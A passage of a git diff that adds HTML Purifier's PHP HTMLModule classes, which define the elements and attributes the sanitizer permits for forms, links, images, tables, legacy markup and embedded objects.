'disabled' => 'Bool#disabled', + 'multiple' => 'Bool#multiple', + 'name' => 'CDATA', + 'size' => 'Number', + 'tabindex' => 'Number', + )); + + $this->addElement('option', false, 'Optional: #PCDATA', 'Common', array( + 'disabled' => 'Bool#disabled', + 'label' => 'Text', + 'selected' => 'Bool#selected', + 'value' => 'CDATA', + )); + // It's illegal for there to be more than one selected, but not + // be multiple. Also, no selected means undefined behavior. This might + // be difficult to implement; perhaps an injector, or a context variable. + + $textarea = $this->addElement('textarea', 'Formctrl', 'Optional: #PCDATA', 'Common', array( + 'accesskey' => 'Character', + 'cols*' => 'Number', + 'disabled' => 'Bool#disabled', + 'name' => 'CDATA', + 'readonly' => 'Bool#readonly', + 'rows*' => 'Number', + 'tabindex' => 'Number', + )); + $textarea->attr_transform_pre[] = new HTMLPurifier_AttrTransform_Textarea(); + + $button = $this->addElement('button', 'Formctrl', 'Optional: #PCDATA | Heading | List | Block | Inline', 'Common', array( + 'accesskey' => 'Character', + 'disabled' => 'Bool#disabled', + 'name' => 'CDATA', + 'tabindex' => 'Number', + 'type' => 'Enum#button,submit,reset', + 'value' => 'CDATA', + )); + + // For exclusions, ideally we'd specify content sets, not literal elements + $button->excludes = $this->makeLookup( + 'form', 'fieldset', // Form + 'input', 'select', 'textarea', 'label', 'button', // Formctrl + 'a', // as per HTML 4.01 spec, this is omitted by modularization + 'isindex', 'iframe' // legacy items + ); + + // Extra exclusion: img usemap="" is not permitted within this element. + // We'll omit this for now, since we don't have any good way of + // indicating it yet. + + // This is HIGHLY user-unfriendly; we need a custom child-def for this + $this->addElement('fieldset', 'Form', 'Custom: (#WS?,legend,(Flow|#PCDATA)*)', 'Common'); + + $label = $this->addElement('label', 'Formctrl', 'Optional: #PCDATA | Inline', 'Common', array( + 'accesskey' => 'Character', + // 'for' => 'IDREF', // IDREF not implemented, cannot allow + )); + $label->excludes = array('label' => true); + + $this->addElement('legend', false, 'Optional: #PCDATA | Inline', 'Common', array( + 'accesskey' => 'Character', + )); + + $this->addElement('optgroup', false, 'Required: option', 'Common', array( + 'disabled' => 'Bool#disabled', + 'label*' => 'Text', + )); + + // Don't forget an injector for <isindex>. This one's a little complex + // because it maps to multiple elements. + + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Hypertext.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Hypertext.php new file mode 100644 index 000000000..d7e9bdd27 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Hypertext.php @@ -0,0 +1,31 @@ +<?php + +/** + * XHTML 1.1 Hypertext Module, defines hypertext links. Core Module. + */ +class HTMLPurifier_HTMLModule_Hypertext extends HTMLPurifier_HTMLModule +{ + + public $name = 'Hypertext'; + + public function setup($config) { + $a = $this->addElement( + 'a', 'Inline', 'Inline', 'Common', + array( + // 'accesskey' => 'Character', + // 'charset' => 'Charset', + 'href' => 'URI', + // 'hreflang' => 'LanguageCode', + 'rel' => new HTMLPurifier_AttrDef_HTML_LinkTypes('rel'), + 'rev' => new HTMLPurifier_AttrDef_HTML_LinkTypes('rev'), + // 'tabindex' => 'Number', + // 'type' => 'ContentType', + ) + ); + $a->formatting = true; + $a->excludes = array('a' => true); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Iframe.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Iframe.php new file mode 100644 index 000000000..287071edf --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Iframe.php @@ -0,0 +1,38 @@ +<?php + +/** + * XHTML 1.1 Iframe Module provides inline frames. + * + * @note This module is not considered safe unless an Iframe + * whitelisting mechanism is specified. Currently, the only + * such mechanism is %URL.SafeIframeRegexp + */ +class HTMLPurifier_HTMLModule_Iframe extends HTMLPurifier_HTMLModule +{ + + public $name = 'Iframe'; + public $safe = false; + + public function setup($config) { + if ($config->get('HTML.SafeIframe')) { + $this->safe = true; + } + $this->addElement( + 'iframe', 'Inline', 'Flow', 'Common', + array( + 'src' => 'URI#embedded', + 'width' => 'Length', + 'height' => 'Length', + 'name' => 'ID', + 'scrolling' => 'Enum#yes,no,auto', + 'frameborder' => 'Enum#0,1', + 'longdesc' => 'URI', + 'marginheight' => 'Pixels', + 'marginwidth' => 'Pixels', + ) + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Image.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Image.php new file mode 100644 index 000000000..948d435bc --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Image.php @@ -0,0 +1,40 @@ +<?php + +/** + * XHTML 1.1 Image Module provides basic image embedding. + * @note There is specialized code for removing empty images in + * HTMLPurifier_Strategy_RemoveForeignElements + */ +class HTMLPurifier_HTMLModule_Image extends HTMLPurifier_HTMLModule +{ + + public $name = 'Image'; + + public function setup($config) { + $max = $config->get('HTML.MaxImgLength'); + $img = $this->addElement( + 'img', 'Inline', 'Empty', 'Common', + array( + 'alt*' => 'Text', + // According to the spec, it's Length, but percents can + // be abused, so we allow only Pixels. + 'height' => 'Pixels#' . $max, + 'width' => 'Pixels#' . $max, + 'longdesc' => 'URI', + 'src*' => new HTMLPurifier_AttrDef_URI(true), // embedded + ) + ); + if ($max === null || $config->get('HTML.Trusted')) { + $img->attr['height'] = + $img->attr['width'] = 'Length'; + } + + // kind of strange, but splitting things up would be inefficient + $img->attr_transform_pre[] = + $img->attr_transform_post[] = + new HTMLPurifier_AttrTransform_ImgRequired(); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Legacy.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Legacy.php new file mode 100644 index 000000000..f278eeced --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Legacy.php @@ -0,0 +1,159 @@ +<?php + +/** + * XHTML 1.1 Legacy module defines elements that were previously + * deprecated. + * + * @note Not all legacy elements have been implemented yet, which + * is a bit of a reverse problem as compared to browsers! In + * addition, this legacy module may implement a bit more than + * mandated by XHTML 1.1. + * + * This module can be used in combination with TransformToStrict in order + * to transform as many deprecated elements as possible, but retain + * questionably deprecated elements that do not have good alternatives + * as well as transform elements that don't have an implementation. + * See docs/ref-strictness.txt for more details. + */ + +class HTMLPurifier_HTMLModule_Legacy extends HTMLPurifier_HTMLModule +{ + + public $name = 'Legacy'; + + public function setup($config) { + + $this->addElement('basefont', 'Inline', 'Empty', false, array( + 'color' => 'Color', + 'face' => 'Text', // extremely broad, we should + 'size' => 'Text', // tighten it + 'id' => 'ID' + )); + $this->addElement('center', 'Block', 'Flow', 'Common'); + $this->addElement('dir', 'Block', 'Required: li', 'Common', array( + 'compact' => 'Bool#compact' + )); + $this->addElement('font', 'Inline', 'Inline', array('Core', 'I18N'), array( + 'color' => 'Color', + 'face' => 'Text', // extremely broad, we should + 'size' => 'Text', // tighten it + )); + $this->addElement('menu', 'Block', 'Required: li', 'Common', array( + 'compact' => 'Bool#compact' + )); + + $s = $this->addElement('s', 'Inline', 'Inline', 'Common'); + $s->formatting = true; + + $strike = $this->addElement('strike', 'Inline', 'Inline', 'Common'); + $strike->formatting = true; + + $u = $this->addElement('u', 'Inline', 'Inline', 'Common'); + $u->formatting = true; + + // setup modifications to old elements + + $align = 'Enum#left,right,center,justify'; + + $address = $this->addBlankElement('address'); + $address->content_model = 'Inline | #PCDATA | p'; + $address->content_model_type = 'optional'; + $address->child = false; + + $blockquote = $this->addBlankElement('blockquote'); + $blockquote->content_model = 'Flow | #PCDATA'; + $blockquote->content_model_type = 'optional'; + $blockquote->child = false; + + $br = $this->addBlankElement('br'); + $br->attr['clear'] = 'Enum#left,all,right,none'; + + $caption = $this->addBlankElement('caption'); + $caption->attr['align'] = 'Enum#top,bottom,left,right'; + + $div = $this->addBlankElement('div'); + $div->attr['align'] = $align; + + $dl = $this->addBlankElement('dl'); + $dl->attr['compact'] = 'Bool#compact'; + + for ($i = 1; $i <= 6; $i++) { + $h = $this->addBlankElement("h$i"); + $h->attr['align'] = $align; + } + + $hr = $this->addBlankElement('hr'); + $hr->attr['align'] = $align; + $hr->attr['noshade'] = 'Bool#noshade'; + $hr->attr['size'] = 'Pixels'; + $hr->attr['width'] = 'Length'; + + $img = $this->addBlankElement('img'); + $img->attr['align'] = 'IAlign'; + $img->attr['border'] = 'Pixels'; + $img->attr['hspace'] = 'Pixels'; + $img->attr['vspace'] = 'Pixels'; + + // figure out this integer business + + $li = $this->addBlankElement('li'); + $li->attr['value'] = new HTMLPurifier_AttrDef_Integer(); + $li->attr['type'] = 'Enum#s:1,i,I,a,A,disc,square,circle'; + + $ol = $this->addBlankElement('ol'); + $ol->attr['compact'] = 'Bool#compact'; + $ol->attr['start'] = new HTMLPurifier_AttrDef_Integer(); + $ol->attr['type'] = 'Enum#s:1,i,I,a,A'; + + $p = $this->addBlankElement('p'); + $p->attr['align'] = $align; + + $pre = $this->addBlankElement('pre'); + $pre->attr['width'] = 'Number'; + + // script omitted + + $table = $this->addBlankElement('table'); + $table->attr['align'] = 'Enum#left,center,right'; + $table->attr['bgcolor'] = 'Color'; + + $tr = $this->addBlankElement('tr'); + $tr->attr['bgcolor'] = 'Color'; + + $th = $this->addBlankElement('th'); + $th->attr['bgcolor'] = 'Color'; + $th->attr['height'] = 'Length'; + $th->attr['nowrap'] = 'Bool#nowrap'; + $th->attr['width'] = 'Length'; + + $td = $this->addBlankElement('td'); + $td->attr['bgcolor'] = 'Color'; + $td->attr['height'] = 'Length'; + $td->attr['nowrap'] = 'Bool#nowrap'; + $td->attr['width'] = 'Length'; + + $ul = $this->addBlankElement('ul'); + $ul->attr['compact'] = 'Bool#compact'; + $ul->attr['type'] = 'Enum#square,disc,circle'; + + // "safe" modifications to "unsafe" elements + // WARNING: If you want to add support for an unsafe, legacy + // attribute, make a new TrustedLegacy module with the trusted + // bit set appropriately + + $form = $this->addBlankElement('form'); + $form->content_model = 'Flow | #PCDATA'; + $form->content_model_type = 'optional'; + $form->attr['target'] = 'FrameTarget'; + + $input = $this->addBlankElement('input'); + $input->attr['align'] = 'IAlign'; + + $legend = $this->addBlankElement('legend'); + $legend->attr['align'] = 'LAlign'; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/List.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/List.php new file mode 100644 index 000000000..79ccefafd --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/List.php @@ -0,0 +1,43 @@ +<?php + +/** + * XHTML 1.1 List Module, defines list-oriented elements. Core Module. + */ +class HTMLPurifier_HTMLModule_List extends HTMLPurifier_HTMLModule +{ + + public $name = 'List'; + + // According to the abstract schema, the List content set is a fully formed + // one or more expr, but it invariably occurs in an optional declaration + // so we're not going to do that subtlety. It might cause trouble + // if a user defines "List" and expects that multiple lists are + // allowed to be specified, but then again, that's not very intuitive. + // Furthermore, the actual XML Schema may disagree. Regardless, + // we don't have support for such nested expressions without using + // the incredibly inefficient and draconic Custom ChildDef. + + public $content_sets = array('Flow' => 'List'); + + public function setup($config) { + $ol = $this->addElement('ol', 'List', new HTMLPurifier_ChildDef_List(), 'Common'); + $ul = $this->addElement('ul', 'List', new HTMLPurifier_ChildDef_List(), 'Common'); + // XXX The wrap attribute is handled by MakeWellFormed. This is all + // quite unsatisfactory, because we generated this + // *specifically* for lists, and now a big chunk of the handling + // is done properly by the List ChildDef. So actually, we just + // want enough information to make autoclosing work properly, + // and then hand off the tricky stuff to the ChildDef. + $ol->wrap = 'li'; + $ul->wrap = 'li'; + $this->addElement('dl', 'List', 'Required: dt | dd', 'Common'); + + $this->addElement('li', false, 'Flow', 'Common'); + + $this->addElement('dd', false, 'Flow', 'Common'); + $this->addElement('dt', false, 'Inline', 'Common'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Name.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Name.php new file mode 100644 index 000000000..05694b450 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Name.php @@ -0,0 +1,21 @@ +<?php + +class HTMLPurifier_HTMLModule_Name extends HTMLPurifier_HTMLModule +{ + + public $name = 'Name'; + + public function setup($config) { + $elements = array('a', 'applet', 'form', 'frame', 'iframe', 'img', 'map'); + foreach ($elements as $name) { + $element = $this->addBlankElement($name); + $element->attr['name'] = 'CDATA'; + if (!$config->get('HTML.Attr.Name.UseCDATA')) { + $element->attr_transform_post['NameSync'] = new HTMLPurifier_AttrTransform_NameSync(); + } + } + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Nofollow.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Nofollow.php new file mode 100644 index 000000000..3aa6654a5 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Nofollow.php @@ -0,0 +1,19 @@ +<?php + +/** + * Module adds the nofollow attribute transformation to a tags. It + * is enabled by HTML.Nofollow + */ +class HTMLPurifier_HTMLModule_Nofollow extends HTMLPurifier_HTMLModule +{ + + public $name = 'Nofollow'; + + public function setup($config) { + $a = $this->addBlankElement('a'); + $a->attr_transform_post[] = new HTMLPurifier_AttrTransform_Nofollow(); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/NonXMLCommonAttributes.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/NonXMLCommonAttributes.php new file mode 100644 index 000000000..5f1b14abb --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/NonXMLCommonAttributes.php @@ -0,0 +1,14 @@ +<?php + +class HTMLPurifier_HTMLModule_NonXMLCommonAttributes extends HTMLPurifier_HTMLModule +{ + public $name = 'NonXMLCommonAttributes'; + + public $attr_collections = array( + 'Lang' => array( + 'lang' => 'LanguageCode', + ) + ); +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Object.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Object.php new file mode 100644 index 000000000..193c1011f --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Object.php @@ -0,0 +1,47 @@ +<?php + +/** + * XHTML 1.1 Object Module, defines elements for generic object inclusion + * @warning Users will commonly use <embed> to cater to legacy browsers: this + * module does not allow this sort of behavior + */ +class HTMLPurifier_HTMLModule_Object extends HTMLPurifier_HTMLModule +{ + + public $name = 'Object'; + public $safe = false; + + public function setup($config) { + + $this->addElement('object', 'Inline', 'Optional: #PCDATA | Flow | param', 'Common', + array( + 'archive' => 'URI', + 'classid' => 'URI', + 'codebase' => 'URI', + 'codetype' => 'Text', + 'data' => 'URI', + 'declare' => 'Bool#declare', + 'height' => 'Length', + 'name' => 'CDATA', + 'standby' => 'Text', + 'tabindex' => 'Number', + 'type' => 'ContentType', + 'width' => 'Length' + ) + ); + + $this->addElement('param', false, 'Empty', false, + array( + 'id' => 'ID', + 'name*' => 'Text', + 'type' => 'Text', + 'value' => 'Text', + 'valuetype' => 'Enum#data,ref,object' + ) + ); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Presentation.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Presentation.php new file mode 100644 index 000000000..8ff0b5ed7 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Presentation.php @@ -0,0 +1,36 @@ +<?php + +/** + * XHTML 1.1 Presentation Module, defines simple presentation-related + * markup. Text Extension Module. + * @note The official XML Schema and DTD specs further divide this into + * two modules: + * - Block Presentation (hr) + * - Inline Presentation (b, big, i, small, sub, sup, tt) + * We have chosen not to heed this distinction, as content_sets + * provides satisfactory disambiguation. + */ +class HTMLPurifier_HTMLModule_Presentation extends HTMLPurifier_HTMLModule +{ + + public $name = 'Presentation'; + + public function setup($config) { + $this->addElement('hr', 'Block', 'Empty', 'Common'); + $this->addElement('sub', 'Inline', 'Inline', 'Common'); + $this->addElement('sup', 'Inline', 'Inline', 'Common'); + $b = $this->addElement('b', 'Inline', 'Inline', 'Common'); + $b->formatting = true; + $big = $this->addElement('big', 'Inline', 'Inline', 'Common'); + $big->formatting = true; + $i = $this->addElement('i', 'Inline', 'Inline', 'Common'); + $i->formatting = true; + $small = $this->addElement('small', 'Inline', 'Inline', 'Common'); + $small->formatting = true; + $tt = $this->addElement('tt', 'Inline', 'Inline', 'Common'); + $tt->formatting = true; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Proprietary.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Proprietary.php new file mode 100644 index 000000000..dd36a3de0 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Proprietary.php @@ -0,0 +1,33 @@ +<?php + +/** + * Module defines proprietary tags and attributes in HTML. + * @warning If this module is enabled, standards-compliance is off! + */ +class HTMLPurifier_HTMLModule_Proprietary extends HTMLPurifier_HTMLModule +{ + + public $name = 'Proprietary'; + + public function setup($config) { + + $this->addElement('marquee', 'Inline', 'Flow', 'Common', + array( + 'direction' => 'Enum#left,right,up,down', + 'behavior' => 'Enum#alternate', + 'width' => 'Length', + 'height' => 'Length', + 'scrolldelay' => 'Number', + 'scrollamount' => 'Number', + 'loop' => 'Number', + 'bgcolor' => 'Color', + 'hspace' => 'Pixels', + 'vspace' => 'Pixels', + ) + ); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Ruby.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Ruby.php new file mode 100644 index 000000000..b26a0a30a --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Ruby.php @@ -0,0 +1,27 @@ +<?php + +/** + * XHTML 1.1 Ruby Annotation Module, defines elements that indicate + * short runs of text alongside base text for annotation or pronounciation. + */ +class HTMLPurifier_HTMLModule_Ruby extends HTMLPurifier_HTMLModule +{ + + public $name = 'Ruby'; + + public function setup($config) { + $this->addElement('ruby', 'Inline', + 'Custom: ((rb, (rt | (rp, rt, rp))) | (rbc, rtc, rtc?))', + 'Common'); + $this->addElement('rbc', false, 'Required: rb', 'Common'); + $this->addElement('rtc', false, 'Required: rt', 'Common'); + $rb = $this->addElement('rb', false, 'Inline', 'Common'); + $rb->excludes = array('ruby' => true); + $rt = $this->addElement('rt', false, 'Inline', 'Common', array('rbspan' => 'Number')); + $rt->excludes = array('ruby' => true); + $this->addElement('rp', false, 'Optional: #PCDATA', 'Common'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/SafeEmbed.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/SafeEmbed.php new file mode 100644 index 000000000..9f3758a32 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/SafeEmbed.php @@ -0,0 +1,34 @@ +<?php + +/** + * A "safe" embed module. See SafeObject. This is a proprietary element. + */ +class HTMLPurifier_HTMLModule_SafeEmbed extends HTMLPurifier_HTMLModule +{ + + public $name = 'SafeEmbed'; + + public function setup($config) { + + $max = $config->get('HTML.MaxImgLength'); + $embed = $this->addElement( + 'embed', 'Inline', 'Empty', 'Common', + array( + 'src*' => 'URI#embedded', + 'type' => 'Enum#application/x-shockwave-flash', + 'width' => 'Pixels#' . $max, + 'height' => 'Pixels#' . $max, + 'allowscriptaccess' => 'Enum#never', + 'allownetworking' => 'Enum#internal', + 'flashvars' => 'Text', + 'wmode' => 'Enum#window,transparent,opaque', + 'name' => 'ID', + ) + ); + $embed->attr_transform_post[] = new HTMLPurifier_AttrTransform_SafeEmbed(); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/SafeObject.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/SafeObject.php new file mode 100644 index 000000000..00da342ef --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/SafeObject.php @@ -0,0 +1,52 @@ +<?php + +/** + * A "safe" object module. In theory, objects permitted by this module will + * be safe, and untrusted users can be allowed to embed arbitrary flash objects + * (maybe other types too, but only Flash is supported as of right now). + * Highly experimental. + */ +class HTMLPurifier_HTMLModule_SafeObject extends HTMLPurifier_HTMLModule +{ + + public $name = 'SafeObject'; + + public function setup($config) { + + // These definitions are not intrinsically safe: the attribute transforms + // are a vital part of ensuring safety. + + $max = $config->get('HTML.MaxImgLength'); + $object = $this->addElement( + 'object', + 'Inline', + 'Optional: param | Flow | #PCDATA', + 'Common', + array( + // While technically not required by the spec, we're forcing + // it to this value. + 'type' => 'Enum#application/x-shockwave-flash', + 'width' => 'Pixels#' . $max, + 'height' => 'Pixels#' . $max, + 'data' => 'URI#embedded', + 'codebase' => new HTMLPurifier_AttrDef_Enum(array( + 'http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0')), + ) + ); + $object->attr_transform_post[] = new HTMLPurifier_AttrTransform_SafeObject(); + + $param = $this->addElement('param', false, 'Empty', false, + array( + 'id' => 'ID', + 'name*' => 'Text', + 'value' => 'Text' + ) + ); + $param->attr_transform_post[] = new HTMLPurifier_AttrTransform_SafeParam(); + $this->info_injector[] = 'SafeObject'; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Scripting.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Scripting.php new file mode 100644 index 000000000..cecdea6c3 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Scripting.php @@ -0,0 +1,54 @@ +<?php + +/* + +WARNING: THIS MODULE IS EXTREMELY DANGEROUS AS IT ENABLES INLINE SCRIPTING +INSIDE HTML PURIFIER DOCUMENTS. USE ONLY WITH TRUSTED USER INPUT!!! + +*/ + +/** + * XHTML 1.1 Scripting module, defines elements that are used to contain + * information pertaining to executable scripts or the lack of support + * for executable scripts. + * @note This module does not contain inline scripting elements + */ +class HTMLPurifier_HTMLModule_Scripting extends HTMLPurifier_HTMLModule +{ + public $name = 'Scripting'; + public $elements = array('script', 'noscript'); + public $content_sets = array('Block' => 'script | noscript', 'Inline' => 'script | noscript'); + public $safe = false; + + public function setup($config) { + // TODO: create custom child-definition for noscript that + // auto-wraps stray #PCDATA in a similar manner to + // blockquote's custom definition (we would use it but + // blockquote's contents are optional while noscript's contents + // are required) + + // TODO: convert this to new syntax, main problem is getting + // both content sets working + + // In theory, this could be safe, but I don't see any reason to + // allow it. + $this->info['noscript'] = new HTMLPurifier_ElementDef(); + $this->info['noscript']->attr = array( 0 => array('Common') ); + $this->info['noscript']->content_model = 'Heading | List | Block'; + $this->info['noscript']->content_model_type = 'required'; + + $this->info['script'] = new HTMLPurifier_ElementDef(); + $this->info['script']->attr = array( + 'defer' => new HTMLPurifier_AttrDef_Enum(array('defer')), + 'src' => new HTMLPurifier_AttrDef_URI(true), + 'type' => new HTMLPurifier_AttrDef_Enum(array('text/javascript')) + ); + $this->info['script']->content_model = '#PCDATA'; + $this->info['script']->content_model_type = 'optional'; + $this->info['script']->attr_transform_pre['type'] = + $this->info['script']->attr_transform_post['type'] = + new HTMLPurifier_AttrTransform_ScriptRequired(); + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/StyleAttribute.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/StyleAttribute.php new file mode 100644 index 000000000..eb78464cc --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/StyleAttribute.php @@ -0,0 +1,24 @@ +<?php + +/** + * XHTML 1.1 Edit Module, defines editing-related elements. Text Extension + * Module. + */ +class HTMLPurifier_HTMLModule_StyleAttribute extends HTMLPurifier_HTMLModule +{ + + public $name = 'StyleAttribute'; + public $attr_collections = array( + // The inclusion routine differs from the Abstract Modules but + // is in line with the DTD and XML Schemas. + 'Style' => array('style' => false), // see constructor + 'Core' => array(0 => array('Style')) + ); + + public function setup($config) { + $this->attr_collections['Style']['style'] = new HTMLPurifier_AttrDef_CSS(); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Tables.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Tables.php new file mode 100644 index 000000000..45c42bb3e --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Tables.php @@ -0,0 +1,69 @@ +<?php + +/** + * XHTML 1.1 Tables Module, fully defines accessible table elements. + */ +class HTMLPurifier_HTMLModule_Tables extends HTMLPurifier_HTMLModule +{ + + public $name = 'Tables'; + + public function setup($config) { + + $this->addElement('caption', false, 'Inline', 'Common'); + + $this->addElement('table', 'Block', + new HTMLPurifier_ChildDef_Table(), 'Common', + array( + 'border' => 'Pixels', + 'cellpadding' => 'Length', + 'cellspacing' => 'Length', + 'frame' => 'Enum#void,above,below,hsides,lhs,rhs,vsides,box,border', + 'rules' => 'Enum#none,groups,rows,cols,all', + 'summary' => 'Text', + 'width' => 'Length' + ) + ); + + // common attributes + $cell_align = array( + 'align' => 'Enum#left,center,right,justify,char', + 'charoff' => 'Length', + 'valign' => 'Enum#top,middle,bottom,baseline', + ); + + $cell_t = array_merge( + array( + 'abbr' => 'Text', + 'colspan' => 'Number', + 'rowspan' => 'Number', + // Apparently, as of HTML5 this attribute only applies + // to 'th' elements. + 'scope' => 'Enum#row,col,rowgroup,colgroup', + ), + $cell_align + ); + $this->addElement('td', false, 'Flow', 'Common', $cell_t); + $this->addElement('th', false, 'Flow', 'Common', $cell_t); + + $this->addElement('tr', false, 'Required: td | th', 'Common', $cell_align); + + $cell_col = array_merge( + array( + 'span' => 'Number', + 'width' => 'MultiLength', + ), + $cell_align + ); + $this->addElement('col', false, 'Empty', 'Common', $cell_col); + $this->addElement('colgroup', false, 'Optional: col', 'Common', $cell_col); + + $this->addElement('tbody', false, 'Required: tr', 'Common', $cell_align); + $this->addElement('thead', false, 'Required: tr', 'Common', $cell_align); + $this->addElement('tfoot', false, 'Required: tr', 'Common', $cell_align); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Target.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Target.php new file mode 100644 index 000000000..2b844ecc4 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Target.php @@ -0,0 +1,23 @@ +<?php + +/** + * XHTML 1.1 Target Module, defines target attribute in link elements. + */ +class HTMLPurifier_HTMLModule_Target extends HTMLPurifier_HTMLModule +{ + + public $name = 'Target'; + + public function setup($config) { + $elements = array('a'); + foreach ($elements as $name) { + $e = $this->addBlankElement($name); + $e->attr = array( + 'target' => new HTMLPurifier_AttrDef_HTML_FrameTarget() + ); + } + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/TargetBlank.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/TargetBlank.php new file mode 100644 index 000000000..e1305ec5d --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/TargetBlank.php @@ -0,0 +1,19 @@ +<?php + +/** + * Module adds the target=blank attribute transformation to a tags. It + * is enabled by HTML.TargetBlank + */ +class HTMLPurifier_HTMLModule_TargetBlank extends HTMLPurifier_HTMLModule +{ + + public $name = 'TargetBlank'; + + public function setup($config) { + $a = $this->addBlankElement('a'); + $a->attr_transform_post[] = new HTMLPurifier_AttrTransform_TargetBlank(); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Text.php b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Text.php new file mode 100644 index 000000000..ae77c7188 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/HTMLModule/Text.php @@ -0,0 +1,71 @@ +<?php + +/** + * XHTML 1.1 Text Module, defines basic text containers. Core Module. + * @note In the normative XML Schema specification, this module + * is further abstracted into the following modules: + * - Block Phrasal (address, blockquote, pre, h1, h2, h3, h4, h5, h6) + * - Block Structural (div, p) + * - Inline Phrasal (abbr, acronym, cite, code, dfn, em, kbd, q, samp, strong, var) + * - Inline Structural (br, span) + * This module, functionally, does not distinguish between these + * sub-modules, but the code is internally structured to reflect + * these distinctions. + */ +class HTMLPurifier_HTMLModule_Text extends HTMLPurifier_HTMLModule +{ + + public $name = 'Text'; + public $content_sets = array( + 'Flow' => 'Heading | Block | Inline' + ); + + public function setup($config) { + + // Inline Phrasal ------------------------------------------------- + $this->addElement('abbr', 'Inline', 'Inline', 'Common'); + $this->addElement('acronym', 'Inline', 'Inline', 'Common'); + $this->addElement('cite', 'Inline', 'Inline', 'Common'); + $this->addElement('dfn', 'Inline', 'Inline', 'Common'); + $this->addElement('kbd', 'Inline', 'Inline', 'Common'); + $this->addElement('q', 'Inline', 'Inline', 'Common', array('cite' => 'URI')); + $this->addElement('samp', 'Inline', 'Inline', 'Common'); + $this->addElement('var', 'Inline', 'Inline', 'Common'); + + $em = $this->addElement('em', 'Inline', 'Inline', 'Common'); + $em->formatting = true; + + $strong = $this->addElement('strong', 'Inline', 'Inline', 'Common'); + $strong->formatting = true; + + $code = $this->addElement('code', 'Inline', 'Inline', 'Common'); + 